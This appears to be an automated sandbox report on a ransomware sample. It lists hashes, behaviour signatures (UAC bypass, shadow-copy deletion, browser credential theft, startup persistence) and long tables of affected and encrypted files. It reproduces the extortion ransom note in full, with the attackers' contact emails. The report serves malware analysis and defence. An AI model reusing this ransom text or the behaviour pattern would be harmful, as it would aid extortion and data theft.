e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f

General

Target

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
Size

1.1MB
MD5

a67baae890d64e81a3f0b250884c8521
SHA1

c41e3830637b1bf722d0dbd5a9207571f33e69d5
SHA256

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f
SHA512

e71a26b408a302a08a9e478d1c0f20a138b6b8ff9a564c8d4dbe3e504da3ca7cb7e29dea4878cc248fc82c575dab94951654a6f3c925b07a3b82b8782478bf23

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\$Recycle.Bin\Read_Me!_.txt

Ransom Note

All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: 6qxipe Email Address: FreedomTeam@mail.ee In Case Of Problem With First Email Write Us E-mail At : Freedom29@Tutanota.com Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/

Emails

FreedomTeam@mail.ee

Freedom29@Tutanota.com

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 1 IoCs

Processes:

pid process

424
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

pid	process
424

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ApproveCompress.tiff	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeUnlock.tiff	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\UnlockWatch.tiff	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 7 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

424
424
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 208.67.222.222
Destination IP 208.67.222.222
Destination IP 208.67.222.222

pid	process
424
424

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Drops desktop.ini file(s) 64 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2632097139-1792035885-811742494-1000\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened (read-only)	\??\H:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\I:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\O:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\P:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\A:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\B:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\E:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\F:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\R:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\S:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\V:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\Y:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\X:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\G:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\K:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\M:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\W:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\L:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\N:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\T:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\J:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\Q:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\U:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened (read-only)	\??\Z:	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Drops file in Program Files directory 64 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_scale-125.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-heap-l1-1-0.dll[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\ui-strings.js	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\ui-strings.js	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_neutral_~_8wekyb3d8bbwe\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\duplicate.svg	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\5B5BC582-D0D5-48E6-BA7C-61A336A0FD96\root\vfs\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-24_altform-lightunplated.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R32.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-200.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-30_altform-unplated_contrast-white.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\vccorlib140.dll[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CHAKRACORE.DLL	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxMediumTile.scale-400.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Wordcnv.dll[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-24_altform-unplated.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-150.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Microsoft.PackageManagement.ArchiverProviders.dll[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LEELAWAD.TTF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailMediumTile.scale-100.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationFramework.resources.dll	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_200_percent.pak	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
